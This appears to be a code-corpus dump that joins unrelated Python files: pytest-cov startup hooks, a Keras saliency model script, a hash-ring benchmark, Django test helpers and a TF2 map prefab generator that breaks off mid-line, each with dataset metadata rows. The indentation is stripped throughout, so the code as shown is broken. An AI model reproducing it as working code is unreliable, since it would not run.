parser.add_argument("-n","--sitename", help="the sitename to generated password to", type=str, required=True)
parser.add_argument("-c","--copy", help="copy to clipboard", action="store_true", default=False)
args = parser.parse_args()
main(args)
except KeyboardInterrupt:
print("\nbye!")
pass | mit | -7,371,451,792,089,840,000 | 29.444444 | 117 | 0.658418 | false |
opoplawski/pytest-cov | src/pytest_cov/embed.py | 1 | 1885 | """Activate coverage at python startup if appropriate.
The python site initialisation will ensure that anything we import
will be removed and not visible at the end of python startup. However
we minimise all work by putting these init actions in this separate
module and only importing what is needed when needed.
For normal python startup when coverage should not be activated the pth
file checks a single env var and does not import or call the init fn
here.
For python startup when an ancestor process has set the env indicating
that code coverage is being collected we activate coverage based on
info passed via env vars.
"""
import os
def multiprocessing_start(obj):
cov = init()
if cov:
multiprocessing.util.Finalize(None, multiprocessing_finish, args=(cov,), exitpriority=1000)
def multiprocessing_finish(cov):
cov.stop()
cov.save()
try:
import multiprocessing.util
except ImportError:
pass
else:
multiprocessing.util.register_after_fork(multiprocessing_start, multiprocessing_start)
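# With this hook registered, every process forked via multiprocessing runs multiprocessing_start,
# which starts its own coverage collector and registers multiprocessing_finish as a Finalize
# callback so the worker's coverage data is stopped and saved before the process exits.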
def init():
# Only continue if ancestor process has set everything needed in
# the env.
cov_source = os.environ.get('COV_CORE_SOURCE')
cov_config = os.environ.get('COV_CORE_CONFIG')
if cov_config:
# Import what we need to activate coverage.
import coverage
# Determine all source roots.
if not cov_source:
cov_source = None
else:
cov_source = cov_source.split(os.pathsep)
# Activate coverage for this process.
cov = coverage.coverage(source=cov_source,
data_suffix=True,
config_file=cov_config,
auto_data=True)
cov.load()
cov.start()
cov._warn_no_data = False
cov._warn_unimported_source = False
return cov
| mit | 5,013,430,591,248,774,000 | 28.920635 | 99 | 0.668435 | false |
cvpr17-id899/saliency | main.py | 1 | 3662 | from __future__ import division
from keras.optimizers import RMSprop
from keras.callbacks import EarlyStopping, ModelCheckpoint, LearningRateScheduler
from keras.layers import Input
from keras.models import Model
import os, cv2, sys
import numpy as np
from config import *
from utilities import preprocess_images, preprocess_maps, postprocess_predictions
from model import sam, kl_divergence, schedule
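# Both generators below loop forever over the sorted image (and ground-truth map) file lists,
# yielding batches of b_s preprocessed images together with a zero-filled tensor of nb_gaussian
# prior maps, which is the second input expected by sam(); generator() also yields the matching
# saliency maps as targets, while generator_test() yields inputs only.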
def generator(b_s, phase_gen='train'):
if phase_gen == 'train':
images = [imgs_train_path + f for f in os.listdir(imgs_train_path) if f.endswith(('.jpg', '.jpeg', '.png'))]
maps = [maps_train_path + f for f in os.listdir(maps_train_path) if f.endswith(('.jpg', '.jpeg', '.png'))]
elif phase_gen == 'val':
images = [imgs_val_path + f for f in os.listdir(imgs_val_path) if f.endswith(('.jpg', '.jpeg', '.png'))]
maps = [maps_val_path + f for f in os.listdir(maps_val_path) if f.endswith(('.jpg', '.jpeg', '.png'))]
else:
raise NotImplementedError
images.sort()
maps.sort()
gaussian = np.zeros((b_s, nb_gaussian, shape_r_gt, shape_c_gt))
counter = 0
while True:
yield [preprocess_images(images[counter:counter+b_s], shape_r, shape_c), gaussian], preprocess_maps(maps[counter:counter+b_s], shape_r_gt, shape_c_gt)
counter = (counter + b_s) % len(images)
def generator_test(b_s, imgs_test_path):
images = [imgs_test_path + f for f in os.listdir(imgs_test_path) if f.endswith(('.jpg', '.jpeg', '.png'))]
images.sort()
gaussian = np.zeros((b_s, nb_gaussian, shape_r_gt, shape_c_gt))
counter = 0
while True:
yield [preprocess_images(images[counter:counter + b_s], shape_r, shape_c), gaussian]
counter = (counter + b_s) % len(images)
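# Entry point: `python main.py train` fits SAM with the KL-divergence loss and checkpoints the
# best weights, while `python main.py test <image_dir>` loads the pretrained SALICON weights and
# writes a postprocessed "<name>_sam.jpg" saliency map for every image in the given directory.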
if __name__ == '__main__':
phase = sys.argv[1]
x = Input((3, shape_r, shape_c))
x_maps = Input((nb_gaussian, shape_r_gt, shape_c_gt))
m = Model(input=[x, x_maps], output=sam([x, x_maps]))
print("Compiling SAM")
m.compile(RMSprop(lr=1e-4, rho=0.9, epsilon=1e-08, decay=0.0), kl_divergence)
if phase == 'train':
print("Training SAM")
m.fit_generator(generator(b_s=b_s), nb_imgs_train, nb_epoch=nb_epoch,
validation_data=generator(b_s=b_s, phase_gen='val'), nb_val_samples=nb_imgs_val,
callbacks=[EarlyStopping(patience=5),
ModelCheckpoint('weights.sam.{epoch:02d}-{val_loss:.4f}.pkl', save_best_only=True),
LearningRateScheduler(schedule=schedule)])
elif phase == "test":
# path of output folder
output_folder = ''
if len(sys.argv) < 3:
raise SyntaxError
imgs_test_path = sys.argv[2]
file_names = [f for f in os.listdir(imgs_test_path) if f.endswith(('.jpg', '.jpeg', '.png'))]
file_names.sort()
nb_imgs_test = len(file_names)
print("Loading SAM weights")
m.load_weights('sam_salicon_weights.pkl')
print("Predicting saliency maps for " + imgs_test_path)
predictions = m.predict_generator(generator_test(b_s=b_s, imgs_test_path=imgs_test_path), nb_imgs_test)
for pred, name in zip(predictions, file_names):
original_image = cv2.imread(imgs_test_path + name, 0)
res = postprocess_predictions(pred[0], original_image.shape[0], original_image.shape[1])
name = name.split('.')[0]
cv2.imwrite(output_folder + '%s_sam.jpg' % name, res.astype(int))
else:
raise NotImplementedError | mit | -5,354,162,971,434,637,000 | 39.636364 | 158 | 0.599126 | false |
ultrabug/uhashring | tests/benchmark.py | 1 | 1073 | # -*- coding: utf-8 -*-
"""This is not part of the test suite.
"""
try:
import ketama
except Exception:
ketama = None
from tempfile import NamedTemporaryFile
from time import time
from uhashring import HashRing
num = 1000000
print("running {} key generation comparison".format(num))
# ketama C binding
if ketama:
with NamedTemporaryFile(prefix="benchmark_") as ketama_config_file:
ketama_config_file.write("127.0.0.1:11211\t600\n")
ketama_config_file.write("127.0.0.1:11212\t400\n")
ketama_config_file.flush()
kt = ketama.Continuum(ketama_config_file.name)
pt = time()
for i in range(num):
key = "myval-{}".format(i)
kt.get_server(key)
print("ketama took {} s".format(time() - pt))
# pure python implementation
ring = HashRing(
nodes={"127.0.0.1:11211": 600, "127.0.0.1:11212": 400},
replicas=4,
vnodes=40,
compat=True,
)
pt = time()
for i in range(num):
key = "myval-{}".format(i)
ring.get_server(key)
print("HashRing took {} s".format(time() - pt))
| bsd-3-clause | -8,145,472,118,921,416,000 | 24.547619 | 71 | 0.629077 | false |
takeyourmeds/takeyourmeds-web | takeyourmeds/utils/test.py | 1 | 1913 | from django.test import TestCase
from django.shortcuts import resolve_url
from django.contrib.auth import get_user_model
User = get_user_model()
class TestCase(TestCase):
def setUp(self):
self.user = self.create_user('testuser')
def assertStatusCode(self, status_code, fn, urlconf, *args, **kwargs):
if kwargs.pop('login', False):
user = kwargs.pop('user', self.user)
self.client.login(email=user.email, password='password')
response = fn(resolve_url(urlconf, *args, **kwargs))
self.assertEqual(
response.status_code,
status_code,
"Got HTTP %d but expected HTTP %d. Response:\n%s" % (
response.status_code,
status_code,
response,
)
)
return response
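# assertStatusCode() is the shared helper: it optionally logs a user in (login=True, or a specific
# user via the `user` kwarg), resolves the urlconf to a URL, performs the request with `fn` and
# asserts the resulting status code before returning the response for further checks.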
def assertGET(self, status_code, urlconf, *args, **kwargs):
return self.assertStatusCode(
status_code,
self.client.get,
urlconf,
*args,
**kwargs
)
def assertPOST(self, status_code, data, *args, **kwargs):
return self.assertStatusCode(
status_code, lambda x: self.client.post(x, data), *args, **kwargs
)
def assertRedirectsTo(self, response, urlconf, *args, **kwargs):
status_code = kwargs.pop('status_code', 302)
target_status_code = kwargs.pop('target_status_code', 200)
return self.assertRedirects(
response,
resolve_url(urlconf, *args, **kwargs),
status_code,
target_status_code,
)
def create_user(self, email):
return User.objects.create_user(email, 'password')
class SuperuserTestCase(TestCase):
def setUp(self):
super(SuperuserTestCase, self).setUp()
self.user.is_staff = True
self.user.is_superuser = True
self.user.save()
| mit | -9,170,222,890,915,416,000 | 28.890625 | 77 | 0.58024 | false |
baldengineers/easytf2_mapper | prefabs/diag_wall_egypt.py | 1 | 126557 | import os
import math
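# rotatePoint() applies the standard 2D rotation matrix: it rotates `point` about `centerPoint`
# by `angle` degrees and returns the new (x, y) pair, which createTile() uses to spin whole
# prefab tiles around their centre.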
def rotatePoint(centerPoint,point,angle):
angle = math.radians(angle)
temp_point = point[0]-centerPoint[0] , point[1]-centerPoint[1]
temp_point = ( temp_point[0]*math.cos(angle)-temp_point[1]*math.sin(angle) , temp_point[0]*math.sin(angle)+temp_point[1]*math.cos(angle))
temp_point = temp_point[0]+centerPoint[0] , temp_point[1]+centerPoint[1]
return temp_point
def createTile(posx, posy, id_num, world_id_num, entity_num, placeholder_list, rotation, level):
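# createTile() places one 512x512 "diagonal wall" (egypt-themed) prefab tile on the map grid:
# posx/posy are grid cell indices (512 units per cell), level stacks copies 448 units apart
# vertically, and rotation selects one of the pre-rotated vertex sets below (0 is unrotated,
# 1 and 2 rotate about the tile centre by 270 and 180 degrees). The remaining id/placeholder
# arguments appear to be bookkeeping shared with the rest of the exporter.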
looplist = '1'
values = []  # Values are all of the lines of a prefab that have the vertex coords
f = open('prefab_template/diag_wall_egypt.txt', 'r+')
lines = f.readlines()  # gathers each line of the prefab and numbers them
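# Each rotation branch below emits the same set of brush vertices; the rotated variants simply
# run every (x, y) pair through rotatePoint() about the tile centre (posx*512+256, posy*-1*512-256)
# before use, while the z values stay tied to `level`.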
if rotation == 0:
x1 = posx*1*512
y1 = posy*-1*512
z1 = level*448 + 64
x2 = posx*1*512 + (512)
y2 = posy*-1*512
z2 = level*448 + 64
x3 = posx*1*512 + (512)
y3 = posy*-1*512 + (-512)
z3 = level*448 + 64
x4 = posx*1*512
y4 = posy*-1*512 + (-512)
z4 = level*448 + 0
x5 = posx*1*512 + (512)
y5 = posy*-1*512 + (-512)
z5 = level*448 + 0
x6 = posx*1*512 + (512)
y6 = posy*-1*512
z6 = level*448 + 0
x7 = posx*1*512
y7 = posy*-1*512
z7 = level*448 + 64
x8 = posx*1*512
y8 = posy*-1*512 + (-512)
z8 = level*448 + 64
x9 = posx*1*512
y9 = posy*-1*512 + (-512)
z9 = level*448 + 0
x10 = posx*1*512 + (512)
y10 = posy*-1*512
z10 = level*448 + 0
x11 = posx*1*512 + (512)
y11 = posy*-1*512 + (-512)
z11 = level*448 + 0
x12 = posx*1*512 + (512)
y12 = posy*-1*512 + (-512)
z12 = level*448 + 64
x13 = posx*1*512 + (512)
y13 = posy*-1*512
z13 = level*448 + 64
x14 = posx*1*512
y14 = posy*-1*512
z14 = level*448 + 64
x15 = posx*1*512
y15 = posy*-1*512
z15 = level*448 + 0
x16 = posx*1*512 + (512)
y16 = posy*-1*512 + (-512)
z16 = level*448 + 0
x17 = posx*1*512
y17 = posy*-1*512 + (-512)
z17 = level*448 + 0
x18 = posx*1*512
y18 = posy*-1*512 + (-512)
z18 = level*448 + 64
x19 = posx*1*512 + (346)
y19 = posy*-1*512 + (-293)
z19 = level*448 + 64
x20 = posx*1*512 + (512)
y20 = posy*-1*512 + (-458)
z20 = level*448 + 64
x21 = posx*1*512 + (512)
y21 = posy*-1*512 + (-458)
z21 = level*448 + 309
x22 = posx*1*512 + (458)
y22 = posy*-1*512 + (-512)
z22 = level*448 + 64
x23 = posx*1*512 + (293)
y23 = posy*-1*512 + (-346)
z23 = level*448 + 64
x24 = posx*1*512 + (293)
y24 = posy*-1*512 + (-346)
z24 = level*448 + 309
x25 = posx*1*512 + (458)
y25 = posy*-1*512 + (-512)
z25 = level*448 + 309
x26 = posx*1*512 + (293)
y26 = posy*-1*512 + (-346)
z26 = level*448 + 309
x27 = posx*1*512 + (346)
y27 = posy*-1*512 + (-293)
z27 = level*448 + 309
x28 = posx*1*512 + (512)
y28 = posy*-1*512 + (-458)
z28 = level*448 + 64
x29 = posx*1*512 + (346)
y29 = posy*-1*512 + (-293)
z29 = level*448 + 64
x30 = posx*1*512 + (293)
y30 = posy*-1*512 + (-346)
z30 = level*448 + 64
x31 = posx*1*512 + (512)
y31 = posy*-1*512 + (-512)
z31 = level*448 + 64
x32 = posx*1*512 + (458)
y32 = posy*-1*512 + (-512)
z32 = level*448 + 64
x33 = posx*1*512 + (458)
y33 = posy*-1*512 + (-512)
z33 = level*448 + 309
x34 = posx*1*512 + (512)
y34 = posy*-1*512 + (-458)
z34 = level*448 + 309
x35 = posx*1*512 + (512)
y35 = posy*-1*512 + (-458)
z35 = level*448 + 64
x36 = posx*1*512 + (512)
y36 = posy*-1*512 + (-512)
z36 = level*448 + 64
x37 = posx*1*512 + (293)
y37 = posy*-1*512 + (-346)
z37 = level*448 + 309
x38 = posx*1*512 + (293)
y38 = posy*-1*512 + (-346)
z38 = level*448 + 64
x39 = posx*1*512 + (346)
y39 = posy*-1*512 + (-293)
z39 = level*448 + 64
x40 = posx*1*512 + (228)
y40 = posy*-1*512 + (-160)
z40 = level*448 + 64
x41 = posx*1*512 + (352)
y41 = posy*-1*512 + (-286)
z41 = level*448 + 64
x42 = posx*1*512 + (352)
y42 = posy*-1*512 + (-286)
z42 = level*448 + 320
x43 = posx*1*512 + (283)
y43 = posy*-1*512 + (-356)
z43 = level*448 + 64
x44 = posx*1*512 + (160)
y44 = posy*-1*512 + (-230)
z44 = level*448 + 64
x45 = posx*1*512 + (160)
y45 = posy*-1*512 + (-230)
z45 = level*448 + 320
x46 = posx*1*512 + (283)
y46 = posy*-1*512 + (-356)
z46 = level*448 + 320
x47 = posx*1*512 + (160)
y47 = posy*-1*512 + (-230)
z47 = level*448 + 320
x48 = posx*1*512 + (228)
y48 = posy*-1*512 + (-160)
z48 = level*448 + 320
x49 = posx*1*512 + (160)
y49 = posy*-1*512 + (-230)
z49 = level*448 + 64
x50 = posx*1*512 + (283)
y50 = posy*-1*512 + (-356)
z50 = level*448 + 64
x51 = posx*1*512 + (352)
y51 = posy*-1*512 + (-286)
z51 = level*448 + 64
x52 = posx*1*512 + (160)
y52 = posy*-1*512 + (-230)
z52 = level*448 + 320
x53 = posx*1*512 + (160)
y53 = posy*-1*512 + (-230)
z53 = level*448 + 64
x54 = posx*1*512 + (228)
y54 = posy*-1*512 + (-160)
z54 = level*448 + 64
x55 = posx*1*512 + (352)
y55 = posy*-1*512 + (-286)
z55 = level*448 + 320
x56 = posx*1*512 + (352)
y56 = posy*-1*512 + (-286)
z56 = level*448 + 64
x57 = posx*1*512 + (283)
y57 = posy*-1*512 + (-356)
z57 = level*448 + 64
x58 = posx*1*512 + (192)
y58 = posy*-1*512 + (-138)
z58 = level*448 + 309
x59 = posx*1*512 + (192)
y59 = posy*-1*512 + (-138)
z59 = level*448 + 64
x60 = posx*1*512 + (250)
y60 = posy*-1*512 + (-197)
z60 = level*448 + 64
x61 = posx*1*512 + (197)
y61 = posy*-1*512 + (-250)
z61 = level*448 + 64
x62 = posx*1*512 + (192)
y62 = posy*-1*512 + (-245)
z62 = level*448 + 64
x63 = posx*1*512 + (192)
y63 = posy*-1*512 + (-245)
z63 = level*448 + 309
x64 = posx*1*512 + (192)
y64 = posy*-1*512 + (-245)
z64 = level*448 + 309
x65 = posx*1*512 + (192)
y65 = posy*-1*512 + (-245)
z65 = level*448 + 64
x66 = posx*1*512 + (192)
y66 = posy*-1*512 + (-138)
z66 = level*448 + 64
x67 = posx*1*512 + (197)
y67 = posy*-1*512 + (-250)
z67 = level*448 + 309
x68 = posx*1*512 + (192)
y68 = posy*-1*512 + (-245)
z68 = level*448 + 309
x69 = posx*1*512 + (192)
y69 = posy*-1*512 + (-138)
z69 = level*448 + 309
x70 = posx*1*512 + (250)
y70 = posy*-1*512 + (-197)
z70 = level*448 + 64
x71 = posx*1*512 + (192)
y71 = posy*-1*512 + (-138)
z71 = level*448 + 64
x72 = posx*1*512 + (192)
y72 = posy*-1*512 + (-245)
z72 = level*448 + 64
x73 = posx*1*512 + (250)
y73 = posy*-1*512 + (-197)
z73 = level*448 + 309
x74 = posx*1*512 + (250)
y74 = posy*-1*512 + (-197)
z74 = level*448 + 64
x75 = posx*1*512 + (197)
y75 = posy*-1*512 + (-250)
z75 = level*448 + 64
x76 = posx*1*512 + (192)
y76 = posy*-1*512 + (-245)
z76 = level*448 + 309
x77 = posx*1*512 + (192)
y77 = posy*-1*512 + (-245)
z77 = level*448 + 64
x78 = posx*1*512 + (138)
y78 = posy*-1*512 + (-192)
z78 = level*448 + 64
x79 = posx*1*512 + (192)
y79 = posy*-1*512 + (-192)
z79 = level*448 + 64
x80 = posx*1*512 + (192)
y80 = posy*-1*512 + (-245)
z80 = level*448 + 64
x81 = posx*1*512 + (192)
y81 = posy*-1*512 + (-245)
z81 = level*448 + 309
x82 = posx*1*512 + (192)
y82 = posy*-1*512 + (-245)
z82 = level*448 + 309
x83 = posx*1*512 + (138)
y83 = posy*-1*512 + (-192)
z83 = level*448 + 309
x84 = posx*1*512 + (192)
y84 = posy*-1*512 + (-192)
z84 = level*448 + 309
x85 = posx*1*512 + (138)
y85 = posy*-1*512 + (-192)
z85 = level*448 + 64
x86 = posx*1*512 + (192)
y86 = posy*-1*512 + (-245)
z86 = level*448 + 64
x87 = posx*1*512 + (192)
y87 = posy*-1*512 + (-192)
z87 = level*448 + 64
x88 = posx*1*512 + (138)
y88 = posy*-1*512 + (-192)
z88 = level*448 + 309
x89 = posx*1*512 + (138)
y89 = posy*-1*512 + (-192)
z89 = level*448 + 64
x90 = posx*1*512 + (192)
y90 = posy*-1*512 + (-192)
z90 = level*448 + 64
x91 = posx*1*512 + (128)
y91 = posy*-1*512 + (-74)
z91 = level*448 + 64
x92 = posx*1*512 + (192)
y92 = posy*-1*512 + (-138)
z92 = level*448 + 64
x93 = posx*1*512 + (192)
y93 = posy*-1*512 + (-138)
z93 = level*448 + 309
x94 = posx*1*512 + (138)
y94 = posy*-1*512 + (-192)
z94 = level*448 + 309
x95 = posx*1*512 + (138)
y95 = posy*-1*512 + (-192)
z95 = level*448 + 64
x96 = posx*1*512 + (128)
y96 = posy*-1*512 + (-181)
z96 = level*448 + 64
x97 = posx*1*512 + (192)
y97 = posy*-1*512 + (-138)
z97 = level*448 + 309
x98 = posx*1*512 + (192)
y98 = posy*-1*512 + (-138)
z98 = level*448 + 64
x99 = posx*1*512 + (192)
y99 = posy*-1*512 + (-192)
z99 = level*448 + 64
x100 = posx*1*512 + (192)
y100 = posy*-1*512 + (-192)
z100 = level*448 + 309
x101 = posx*1*512 + (192)
y101 = posy*-1*512 + (-192)
z101 = level*448 + 64
x102 = posx*1*512 + (138)
y102 = posy*-1*512 + (-192)
z102 = level*448 + 64
x103 = posx*1*512 + (138)
y103 = posy*-1*512 + (-192)
z103 = level*448 + 309
x104 = posx*1*512 + (128)
y104 = posy*-1*512 + (-181)
z104 = level*448 + 309
x105 = posx*1*512 + (128)
y105 = posy*-1*512 + (-74)
z105 = level*448 + 309
x106 = posx*1*512 + (192)
y106 = posy*-1*512 + (-138)
z106 = level*448 + 64
x107 = posx*1*512 + (128)
y107 = posy*-1*512 + (-74)
z107 = level*448 + 64
x108 = posx*1*512 + (128)
y108 = posy*-1*512 + (-181)
z108 = level*448 + 64
x109 = posx*1*512 + (128)
y109 = posy*-1*512 + (-181)
z109 = level*448 + 309
x110 = posx*1*512 + (128)
y110 = posy*-1*512 + (-181)
z110 = level*448 + 64
x111 = posx*1*512 + (128)
y111 = posy*-1*512 + (-74)
z111 = level*448 + 64
x112 = posx*1*512 + (53)
y112 = posy*-1*512
z112 = level*448 + 64
x113 = posx*1*512 + (128)
y113 = posy*-1*512 + (-74)
z113 = level*448 + 64
x114 = posx*1*512 + (128)
y114 = posy*-1*512 + (-74)
z114 = level*448 + 309
x115 = posx*1*512 + (128)
y115 = posy*-1*512 + (-181)
z115 = level*448 + 64
x116 = posx*1*512
y116 = posy*-1*512 + (-53)
z116 = level*448 + 64
x117 = posx*1*512
y117 = posy*-1*512 + (-53)
z117 = level*448 + 309
x118 = posx*1*512
y118 = posy*-1*512 + (-53)
z118 = level*448 + 309
x119 = posx*1*512
y119 = posy*-1*512 + (-53)
z119 = level*448 + 64
x120 = posx*1*512
y120 = posy*-1*512
z120 = level*448 + 64
x121 = posx*1*512 + (128)
y121 = posy*-1*512 + (-181)
z121 = level*448 + 309
x122 = posx*1*512
y122 = posy*-1*512 + (-53)
z122 = level*448 + 309
x123 = posx*1*512
y123 = posy*-1*512
z123 = level*448 + 309
x124 = posx*1*512 + (128)
y124 = posy*-1*512 + (-74)
z124 = level*448 + 64
x125 = posx*1*512 + (53)
y125 = posy*-1*512
z125 = level*448 + 64
x126 = posx*1*512
y126 = posy*-1*512
z126 = level*448 + 64
x127 = posx*1*512 + (128)
y127 = posy*-1*512 + (-74)
z127 = level*448 + 309
x128 = posx*1*512 + (128)
y128 = posy*-1*512 + (-74)
z128 = level*448 + 64
x129 = posx*1*512 + (128)
y129 = posy*-1*512 + (-181)
z129 = level*448 + 64
x130 = posx*1*512
y130 = posy*-1*512
z130 = level*448 + 309
x131 = posx*1*512
y131 = posy*-1*512
z131 = level*448 + 64
x132 = posx*1*512 + (53)
y132 = posy*-1*512
z132 = level*448 + 64
#INSERT_ROT_0_PY_LIST
elif rotation == 1:
x1 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 270)[0])
y1 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 270)[1])
z1 = level*448 + 64
x2 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 270)[0])
y2 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 270)[1])
z2 = level*448 + 64
x3 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 270)[0])
y3 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 270)[1])
z3 = level*448 + 64
x4 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 270)[0])
y4 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 270)[1])
z4 = level*448 + 0
x5 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 270)[0])
y5 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 270)[1])
z5 = level*448 + 0
x6 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 270)[0])
y6 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 270)[1])
z6 = level*448 + 0
x7 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 270)[0])
y7 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 270)[1])
z7 = level*448 + 64
x8 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 270)[0])
y8 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 270)[1])
z8 = level*448 + 64
x9 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 270)[0])
y9 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 270)[1])
z9 = level*448 + 0
x10 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 270)[0])
y10 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 270)[1])
z10 = level*448 + 0
x11 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 270)[0])
y11 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 270)[1])
z11 = level*448 + 0
x12 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 270)[0])
y12 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 270)[1])
z12 = level*448 + 64
x13 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 270)[0])
y13 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 270)[1])
z13 = level*448 + 64
x14 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 270)[0])
y14 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 270)[1])
z14 = level*448 + 64
x15 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 270)[0])
y15 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 270)[1])
z15 = level*448 + 0
x16 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 270)[0])
y16 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 270)[1])
z16 = level*448 + 0
x17 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 270)[0])
y17 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 270)[1])
z17 = level*448 + 0
x18 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 270)[0])
y18 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 270)[1])
z18 = level*448 + 64
x19 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 270)[0])
y19 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 270)[1])
z19 = level*448 + 64
x20 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 270)[0])
y20 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 270)[1])
z20 = level*448 + 64
x21 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 270)[0])
y21 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 270)[1])
z21 = level*448 + 309
x22 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 270)[0])
y22 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 270)[1])
z22 = level*448 + 64
x23 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 270)[0])
y23 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 270)[1])
z23 = level*448 + 64
x24 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 270)[0])
y24 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 270)[1])
z24 = level*448 + 309
x25 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 270)[0])
y25 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 270)[1])
z25 = level*448 + 309
x26 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 270)[0])
y26 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 270)[1])
z26 = level*448 + 309
x27 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 270)[0])
y27 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 270)[1])
z27 = level*448 + 309
x28 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 270)[0])
y28 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 270)[1])
z28 = level*448 + 64
x29 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 270)[0])
y29 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 270)[1])
z29 = level*448 + 64
x30 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 270)[0])
y30 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 270)[1])
z30 = level*448 + 64
x31 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 270)[0])
y31 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 270)[1])
z31 = level*448 + 64
x32 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 270)[0])
y32 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 270)[1])
z32 = level*448 + 64
x33 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 270)[0])
